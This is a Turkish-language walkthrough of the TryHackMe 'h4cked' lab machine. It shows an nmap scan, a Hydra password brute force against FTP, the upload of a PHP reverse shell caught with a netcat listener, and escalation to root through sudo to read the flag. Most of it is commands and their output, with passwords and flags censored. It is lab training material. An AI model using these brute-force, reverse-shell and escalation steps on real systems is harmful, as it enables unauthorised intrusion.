TryHackMe – h4cked Makine Çözümü

Alper Karaca05 mins

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “h4cked” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.154.37
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-07 17:55 +03
Nmap scan report for 10.10.154.37
Host is up (0.090s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.83 seconds

2 — “jenny” kullanıcı adını kullanarak FTP servisine yönelik parola saldırısını başlatıyorum.

[root:/home/alper/Desktop/TRYHACKME]# hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.154.37
*
*
[21][ftp] host: 10.10.154.37   login: jenny   password: *CENSORED*

3 — FTP sunucusuna bir “php reverse shell” yükleyerek tarayıcıdan tetikliyorum.

[root:/home/alper/Desktop/TRYHACKME]# ftp 10.10.154.37
Connected to 10.10.154.37.
220 Hello FTP World!
Name (10.10.154.37:alper): jenny
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||12226|)
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000        10918 Feb 01  2021 index.html
-rwxrwxrwx    1 1000     1000         5493 Feb 01  2021 shell.php
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||17113|)
150 Ok to send data.
100% |*************************************************************************|  2354      299.71 KiB/s    00:00 ETA
226 Transfer complete.
2354 bytes sent in 00:00 (15.95 KiB/s)
ftp> exit
221 Goodbye.
[root:/home/alper/Desktop/TRYHACKME]# nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.154.37 50424
Linux wir3 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 15:02:51 up 9 min,  0 users,  load average: 0.14, 0.78, 0.65
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

4 — “jenny” kullanıcısına geçtikten sonra “sudo -l” komutu ile sudo yetkisi ile kullanabileceğim komutları görüyorum. Sudo yetkisine sahip olduğumu görüp root kullanıcısına geçiyorum. Root dizininden bayrağımı elde ediyorum.

$ SHELL=/bin/bash script -q /dev/null
www-data@wir3:/$ su jenny
su jenny
Password: **CENSORED**

whoami
whoami
jenny@wir3:/$ whoami
jenny
jenny@wir3:/$ sudo -l
sudo -l
[sudo] password for jenny: **CENSORED**

Matching Defaults entries for jenny on wir3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jenny may run the following commands on wir3:
    (ALL : ALL) ALL
jenny@wir3:/$ sudo su
sudo su
root@wir3:/# cd /root      
cd /root
root@wir3:~# ls
ls
Reptile
root@wir3:~# cd Reptile
cd Reptile
root@wir3:~/Reptile# ls
ls
configs   Kconfig  Makefile  README.md  userland
flag.txt  kernel   output    scripts
root@wir3:~/Reptile# cat flag.txt
cat flag.txt
***CENSORED***

Related News